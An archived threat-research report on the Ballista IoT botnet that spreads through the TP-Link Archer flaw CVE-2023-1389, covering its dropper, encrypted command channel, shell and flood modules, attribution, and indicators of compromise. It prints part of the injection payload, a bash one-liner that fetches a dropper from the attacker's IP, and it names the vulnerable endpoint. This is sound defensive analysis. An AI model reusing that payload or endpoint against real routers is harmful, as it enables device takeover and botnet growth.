{
	"id": "91acab3d-c89b-4d3c-8648-5ab463f1d3ac",
	"created_at": "2026-04-06T01:31:07.46977Z",
	"updated_at": "2026-04-10T13:12:27.863346Z",
	"deleted_at": null,
	"sha1_hash": "1f46723dca26b3154f3d5de63641f1f60f1af8f5",
	"title": "Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting Thousands of TP-Link Archer Routers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 118891,
	"plain_text": "Cato CTRL Threat Research: Ballista – New IoT Botnet Targeting\r\nThousands of TP-Link Archer Routers\r\nBy Matan Mittelman, Ofek Vardi\r\nPublished: 2025-03-11 · Archived: 2026-04-06 01:21:20 UTC\r\nListen to post:\r\nExecutive Summary\r\nOver the years, major IoT botnets like Mirai and Mozi have proven how easily routers can be exploited and threat\r\nactors have taken note. Two key issues have played in their favor: the fact that users rarely deploy new firmware\r\nto their routers, coupled with the lack of regard for security by router vendors. As a result, router vulnerabilities\r\nmay persist in the wild for much longer than initially expected, even after patches are published publicly.\r\nSince the start of 2025, Cato CTRL has been collecting data on exploitation attempts of IoT devices and malware\r\ndeployed through these attempts. During our analysis, a previously unreported global IoT botnet campaign\r\ntargeting TP-Link Archer routers has emerged. The botnet exploits a remote code execution (RCE) vulnerability in\r\nTP-Link Archer routers (CVE-2023-1389) to spread itself automatically over the Internet. Specifically, the AX21\r\nmodel (aka AX1800 model; a firmware update can be found here) to spread itself automatically over the\r\nInternet. TP-Link products have made headlines recently, as The Wall Street Journal reported in December 2024\r\nthat U.S. government agencies have considered banning TP-Link devices due to security concerns linked to China.\r\nCato CTRL first identified this campaign on January 10. Over the course of a few weeks, several initial-access\r\nattempts were detected, with the most recent attempt taking place on February 17. The Initial payload includes a\r\nmalware dropper (specifically, a bash script) that downloads the malware. During our analysis, we observed the\r\nbotnet evolving by switching to the use of Tor domains to become stealthier—possibly prompted by our\r\ninvestigation into this campaign.\r\nOnce executed, the malware sets up a TLS encrypted command and control (C2) channel on port 82, which is\r\nused to fully control the compromised device. This allows running shell commands to conduct further RCE and\r\ndenial of service (DoS) attacks. In addition, the malware attempts to read sensitive files on the local system.\r\nCato CTRL assesses with moderate confidence that this campaign is linked to an Italian-based threat actor, based\r\non the IP address location (2.237.57[.]70) of the C2 server and supported by Italian strings found within the\r\nmalware binaries. Due to the Italian links, and the targeted TP-Link Archer routers, we have named the botnet\r\n“Ballista” as a reference to the ancient Roman weapon.\r\nThe Ballista botnet has targeted manufacturing, medical/healthcare, services, and technology organizations in the\r\nU.S., Australia, China, and Mexico. Using a Censys search, we’ve identified more than 6,000 vulnerable devices\r\nconnected to the Internet at the time of writing. We believe the botnet is still active. The analysis below outlines\r\nthe inner workings of the malware, its C2 protocol, discovery techniques, and DoS capabilities.\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 1 of 9\n\nThe Cato SASE Cloud Platform safeguards organizations from the Ballista botnet and similar threats by\r\nleveraging a multi-layered security approach:\r\nCato IPS provides both tailored and generic protections for blocking CVE-2023-1389. In addition, it\r\nprovides behavioral detections for malware activity, such as lateral movement and C2 communication,\r\nprotecting all Cato-connected edges (sites, remote users, and cloud resources).\r\nCato IoT/OT Security provides device identification, which enables administrators to implement tailored\r\npolicies for devices on their network, enhancing an organization’s security posture across its weak points.\r\nTechnical Overview\r\nDropper Analysis\r\nAs part of its initial access vector, the Ballista botnet exploits CVE-2023-1389. This vulnerability in the TP-Link\r\nArcher router’s web management interface (T1190) stems from the lack of sanitization of user input in the country\r\nform of the /cgi-bin/luci;stok=/locale endpoint, resulting in unauthenticated command execution (T1059.004)\r\nwith root privileges.\r\nThe botnet exploits this vulnerability by injecting a payload that downloads and executes a cleartext shell dropper\r\nnamed dropbpb.sh, responsible for downloading the malware binaries and executing them on the compromised\r\ndevice.\r\nThe URL-decoded payload used to install the dropper can be seen below:\r\n$(echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / \u0026\u0026 dbp=\"dropbpb.sh\"; while true; do r=$(curl http\r\nThis bash one-liner writes a while loop that attempts to download the dropper from an attacker-controlled server\r\n(2.237.57[.]70) on port 81 (T1571), via HTTP (T1071.001), and writes it onto disk. Next, it gives it full\r\npermissions (T1222.002) and executes it as a background process.\r\nUpon execution, the dropper removes itself from disk (T1070.004) and attempts to move to other directories on\r\nthe local system (T1083, T1070.010), where it will download and execute the malware.\r\nEventually, the script drops five pre-compiled binaries onto the target system (T1105) named bpb.$arch,\r\ncorresponding to the following system architectures: mips, mipsel, armv5l, armv7l, x86_64, using the curl\r\ncommand or wget as a fallback. This behavior is common amongst malware droppers. One thing to note here: the\r\ndropper is behaving in a “noisy” manner by attempting to download and execute all the different binaries, rather\r\nthan checking for the compromised architecture and downloading the corresponding binary. Both of these\r\napproaches have been observed in other droppers throughout our research into IoT malware.\r\nFor example, we observed RedTail cryptominer droppers using the uname –mp command to find the hardware\r\nplatform type and processor architecture.\r\nDropper Analysis\r\nFigure 1. Dropper code used to download the malware binaries\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 2 of 9\n\nCato CTRL – The Cyber Threats Research Lab | Learn more\r\nMalware Capabilities (High-Level)\r\nThe default malware execution flow displays the following capabilities:\r\n1. Kills previous instances of itself (T1057) and removes itself from disk upon execution (T1070.004) to\r\navoid detection.\r\n2. Reads numerous configuration files on the system (T1005, TA0007).\r\n3. Sets up an encrypted C2 channel on port 82 (T1573, T1095), through which additional functionality can be\r\ninvoked.\r\n4. Spreads to other devices on the Internet automatically by attempting to exploit CVE-2023-1389 (T1190,\r\nT1059.004).\r\nUpon receiving certain commands from the C2 server, the malware can also employ additional capabilities:\r\n1. Run shell commands on the compromised device (T1059.004).\r\n2. Start a DoS/DDoS attack (T1499).\r\nMalware Capabilities (Deep-Dive)\r\nIn this section, we’ll go over the malware’s capabilities mentioned above, elaborate on the different modules\r\nemployed by this malware, and analyze how each module helps achieve different objectives.\r\nIn order to handle the different modules, the malware maintains a module queue, which holds modules requested\r\nby the C2 server. In addition, it starts a background thread which continuously checks the queue for new modules\r\nand triggers them in new threads.\r\nThe following model illustrates how the malware operates.\r\nMalware Capabilities (Deep-Dive)\r\nFigure 2. Malware execution flow\r\nMain Thread\r\nAs seen in the above illustration, the main thread starts by killing previous instances of the malware and removing\r\nits binaries from disk. This behavior is reflected in the standard output.\r\nMain Thread\r\nFigure 3. Malware standard output (part 1)\r\nTaking a deeper look into the assembly code reveals the use of multiple ps commands to list running processes\r\nbefore killing the ones associated with the malware binaries using the SIGTERM signal of the sys_kill syscall.\r\nUsing ps commands to list \u0026 kill previous instances (malware assembly code)\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 3 of 9\n\nFigure 4. Using ps commands to list \u0026 kill previous instances (malware assembly code)\r\nWe can also see the command used to remove the malware files from disk.\r\nUsing rm commands to remove binaries from disk (malware assembly code)\r\nFigure 5. Using rm commands to remove binaries from disk (malware assembly code)\r\nThis behavior is common amongst IoT malware, as the removal of fingerprint and noise reduction helps avoid\r\ndetection.\r\nReading Sensitive Files\r\nIn addition, we observed attempts to read many sensitive files on the local system made by the malware, which is\r\nreflected in its strings and syscalls. Some of the files being accessed:\r\nConfig and environment related files, such as: /etc/hosts, /etc/resolv.conf, /etc/nsswitch.conf\r\nUser and authentication related files and directories, such as:  /etc/passwd, /etc/shadow, /etc/sudoers,\r\n/etc/pam.d/\r\nSSL related files: /etc/ssl/openssl.conf, /etc/security/limits.conf\r\nWhile we haven’t identified any particular use for these files, it is still important to note that threat actors can\r\npotentially use this data for multiple malicious activities, such as: exfiltration, blocking access by modifiying\r\nenvironment congiuration, creating backdoors, moving laterally, etc.\r\nC2 Setup\r\nAfter these steps are concluded, the malware prints the operating system (OS) architecture and starts seting up a\r\nC2 channel.\r\nC2 Setup\r\nFigure 6. Malware standard output (part 2)\r\nAnalyzing the network traffic reveals this C2 channel leads to the same attacker-controlled IP from which the\r\nmalware was downloaded (2.237.57[.]70), on port 82.\r\nLooking into the assembly code reveals the use of the pthread_create() function to start a new thread for the\r\nC2 setup. Analyzing the function being called in that new thread reveals the C2 is established over transport layer\r\nsecurity (TLS). The first packet being sent after the handshake includes the hiimrealinfected string, an\r\nindicator of compromise (IoC) unique to this malware. The second packet being sent includes the\r\nclient_info_architecture x86_64 string. These two strings are the only data being sent by the client by default.\r\nFirst packet data sent by the client over the C2 channel (malware assembly code)\r\nFigure 7. First packet data sent by the client over the C2 channel (malware assembly code)\r\nExploiter Module\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 4 of 9\n\nSimultaneously, the EXPLOITER module, responsible for spreading the malware over the Internet, is added to the\r\nqueue. Before each iteration, the malware hangs for five minutes by invoking the sys_nanosleep syscall, a\r\nbehavior common amongst malware for detection evasion.\r\nThe exploitation attempts for CVE-2023-1389 being sent by the EXPLOITER module over HTTP to port 8080\r\nuse the same payload we’ve analyzed at the beginning of this blog.\r\nThis process is also reflected in the standard output. HTTP headers, chat messages, or database logs.\r\nMalware standard output (part 3)\r\nFigure 8. Malware standard output (part 3)\r\nThis concludes the default malware execution flow, but further analysis of the assembly code revealed the\r\nmalware takes certain actions based on keywords found in commands received from the C2 channel. If a new\r\nmodule is requested, the malware adds it to the queue (like the FLOODER module as portrayed in the above\r\nillustration).\r\nC2 Commands\r\nLooking into the function responsible for parsing the C2 commands revealed the following keywords:\r\nflooder: Keyword to start the FLOODER module.\r\nexploiter: Keyword to start the EXPLOITER module.\r\nstart: Optional parameter to be used with the exploiter keyword to start the module. If absent, the\r\nKILLALL module is triggered instead.\r\nclose: Keyword to stop the module triggering function.\r\nshell: Keyword to run a Linux shell command on the local system.\r\nkillall: Keyword to start the KILLALL module.\r\nThe two most notable keywords here are the shell and flooder modules, which we’ll explain in the next section.\r\nShell Module\r\nThe shell keyword is expected to be followed by a bash command used as a parameter for invoking sys_execve.\r\nThis is a basic backdoor capability which allows for any number of post-exploitation activities, such as data\r\nexfiltration, persistence, lateral movement, etc.\r\nShell module implementation (malware assembly code)\r\nFigure 9. Shell module implementation (malware assembly code)\r\nFlooder Module\r\nThe flooder keyword is expected to be followed by seven parameters. These parameters are printed one by one,\r\nthen processed by the flooder module after it is triggered from the queue.\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 5 of 9\n\nAnalyzing the flooder module reveals new threads continuously being invoked in a loop, using the pthread_create\r\nfunction call. The arguments for this call are computed from the parameters received by the C2.\r\nWhile it seems that the malware is built in a modular fashion which allows for multiple flood attack types, only\r\none implementation has been identified. This attack is triggered by the keyword tcpgeneric, found in a memory\r\naddress computed from the C2 command parameters.\r\nThe flooder keyword and parameters are sent over a RAW socket. The module’s data is being dynamically\r\ncomputed from the received parameters (encrypted). Thus, we’re unable to analyze it further.\r\nFlooder module raw socket creation (malware assembly code)\r\nFigure 10. Flooder module raw socket creation (malware assembly code)\r\nAttribution\r\nCato CTRL has identified an individual threat actor linked to the Ballista botnet. We assess the threat actor is\r\nItalian-based. This assessment is made with moderate confidence based on the IP address location (2.237.57[.]70)\r\nof the C2 server and supported by Italian strings found within the malware binaries.\r\nAs of this writing, we’ve noticed this IP is no longer responding and have found a new variant of the malware\r\ndropper on GitHub, using Tor domains instead of the hard-coded IP. This suggests an increase in the sophistication\r\nlevel of the campaign by the threat actor. While this malware sample shares similarities with other botnets, it\r\nremains distinct from widely used botnets such as Mirai and Mozi.\r\nConclusion\r\nIoT devices have been constantly targeted by threat actors for multiple reasons:\r\nThey are often connected to the Internet and come with web interfaces, which use default/weak credentials,\r\nallowing for an easy initial access vector.\r\nThey are usually not well-maintained, lack robust security, contain numerous vulnerabilities, and take time\r\nto receive security patches. Combined with the fact that the update process for these devices often lacks\r\nautomated patching mechanisms and may require manual firmware installations, protecting them is\r\ncumbersome and difficult.\r\nProactive identification and management of IoT devices within an organization’s network remain essential for\r\nmitigating risk and ensuring the resilience of critical infrastructure.\r\nProtections\r\nThe Cato SASE Cloud Platform safeguards organizations from the Ballista botnet and similar threats by\r\nleveraging a multi-layered security approach:\r\nCato IPS provides both tailored and generic protections for blocking CVE-2023-1389. In addition, it\r\nprovides behavioral detections for malware activity, such as lateral movement and C2 communication,\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 6 of 9\n\nprotecting all Cato-connected edges (sites, remote users, and cloud resources).\r\nCato IoT/OT Security provides device identification, which enables administrators to implement tailored\r\npolicies for devices on their network, enhancing an organization’s security posture across its weak points.\r\nIndicators of Compromise (IoCs)\r\nIndicator of Compromise Description\r\nRelevant\r\nLinks\r\n2.237.57[.]70 Attacker C2 IP VirusTotal\r\naccede01b73348e0d2dc306f024f7c97\r\n9758892f66fb2a550f4f1089d92549f4\r\nDropper Hash VirusTotal\r\nfca22a82fa3f51b40ef0cffd8752b25f87\r\n6f162061c342097cf4d93531ff1221\r\nx86_64 Binary Hash VirusTotal\r\nab5e045a74fa46aabef10a1473eba51c6\r\n166638e807aa7e3abeb701463975697\r\nmipsel Binary Hash VirusTotal\r\n72ef87125a1818dd20ce616cab622a7614fcb5cfcf9146465c8280a\r\n89f2c85f0\r\nmips Binary Hash VirusTotal\r\n3582fb08532a5a5c715a65787c30c89f90449fb014c04ede9c488e\r\nb010c52d02\r\narmv7l Binary Hash VirusTotal\r\nd7723361ca455d8a1a9714ea4b80013f77b764cb721ad151a310e2\r\n3e3b4610a8\r\narmv5l Binary Hash VirusTotal\r\nf1a4c0bc9fc227071e443706d28ee6deea2ebcbb7a06b7e405564\r\n4ba0cde7cfb\r\nNew Dropper Variant\r\nHash\r\nVirusTotal\r\nhiimrealinfected\r\nC2 Client 1st Packet\r\nData\r\nclient_info_architecture x86_64\r\nC2 Client 2nd Packet\r\nData\r\nnpxXoudifFeEgGaACScs\r\nMalware Binary\r\nUnique String\r\nTTPs\r\nTactic Technique Indicator\r\nInitial Access\r\n(TA0001)\r\nExploit Public-Facing Application (T1190)\r\nThe malware exploits a vulnerability in\r\nthe router’s web management interface\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 7 of 9\n\nExecution\r\n(TA0002)\r\nCommand and Scripting Interpreter: Unix\r\nShell (T1059.004)\r\n– The malware \u0026 dropper are installed and\r\nexecuted using a bash script\r\n– The malware allows for on-demand shell\r\ncommand execution\r\nDefense\r\nEvasion\r\n(TA0005)\r\nFile and Directory Permissions\r\nModification: Linux and Mac File and\r\nDirectory Permissions Modification\r\n(T1222.002)\r\nThe attacker changes the permissions of\r\ndropped scripts using the chmod\r\ncommand\r\nIndicator Removal: File Deletion\r\n(T1070.004)\r\nThe malware removes itself and the\r\ndropper from disk using the rm command\r\nIndicator Removal: Relocate Malware\r\n(T1070.010)\r\nThe dropper relocates before downloading\r\nthe malware binaries\r\nObfuscated Files or Information: Binary\r\nPadding (T1027.001)\r\nRepeated no-op instructions were\r\nobserved during reverse engineering\r\nanalysis\r\nObfuscated Files or Information: Stripped\r\nPayloads (T1027.008)\r\nThe malware binaries are stripped \u0026\r\nstatically linked\r\nObfuscated Files or Information:\r\nCommand Obfuscation (T1027.010)\r\n– The payload used for CVE-2023-1389 is\r\nURL-encoded\r\n– The malware includes base64 related\r\nstrings\r\nCredential\r\nAccess\r\n(TA0006)\r\nCredentials from Password Stores (T1555)\r\nThe malware reads multiple files storing\r\nuser credentials\r\nOS Credential Dumping: /etc/passwd and\r\n/etc/shadow (T1003.008)\r\nThe malware reads the /etc/passwd \u0026\r\n/etc/shadow files\r\nDiscovery\r\n(TA0007) File and Directory Discovery (T1083)\r\nThe dropper searches for directories with\r\nspecific permissions using the find\r\ncommand\r\nPassword Policy Discovery (T1201) The malware reads files at /etc/pam.d/\r\nProcess Discovery (T1057)\r\nThe malware lists processes using the ps\r\ncommand\r\nSystem Information Discovery (T1082)\r\nThe malware sends the OS architecture to\r\nthe C2\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 8 of 9\n\nSystem Network Configuration Discovery\r\n(T1016)\r\nThe malware reads /etc/hosts \u0026 other\r\nnetwork configuration related files\r\nSystem Network Configuration Discovery:\r\nInternet Connection Discovery\r\n(T1016.001)\r\nThe malware sends GET requests to check\r\nconnectivity before attempting to exploit\r\nCVE-2023-1389\r\nCollection\r\n(TA0009)\r\nData from Local System (T1005)\r\nThe malware reads multiple files related to\r\nsystem \u0026 network configuration, user\r\ndata, package management \u0026 more\r\nCommand and\r\nControl\r\n(TA0011)\r\nNon-Application Layer Protocol (T1095)\r\nThe malware C2sends data over TLS\r\nusing a custom protocol\r\nNon-Standard Port (T1571)\r\nThe malware C2 is using ports 81 \u0026 82 to\r\ndownload binaries \u0026 communicate\r\nrespectively\r\nEncrypted Channel: Symmetric\r\nCryptography (T1537.001)\r\nThe malware C2 channel is TLS encrypted\r\nEncrypted Channel: Asymmetric\r\nCryptography (T1537.002)\r\n– The malware C2 channel is TLS\r\nencrypted\r\n– The malware includes strings related to\r\nprivate \u0026 public encryption keys\r\nIngress Tool Transfer (T1105)\r\nThe dropper \u0026 malware binaries are\r\ndownloaded from the C2 server using curl\r\n/ wget\r\nApplication Layer Protocol: Web Protocols\r\n(T1071.001)\r\nThe dropper \u0026 malware binaries are\r\ndownloaded from the C2 server over\r\nHTTP using curl / wget\r\nProxy: Multi-hop Proxy (T1090.003)\r\nA new variant of the dropper was\r\nobserved using .onion TOR domains\r\nHide Infrastructure (T1665)\r\nA new variant of the dropper was\r\nobserved using .onion TOR domains\r\nSource: https://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nhttps://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.catonetworks.com/blog/cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers/"
	],
	"report_names": [
		"cato-ctrl-ballista-new-iot-botnet-targeting-thousands-of-tp-link-archer-routers"
	],
	"threat_actors": [],
	"ts_created_at": 1775439067,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.pdf",
		"text": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.txt",
		"img": "https://archive.orkl.eu/1f46723dca26b3154f3d5de63641f1f60f1af8f5.jpg"
	}
}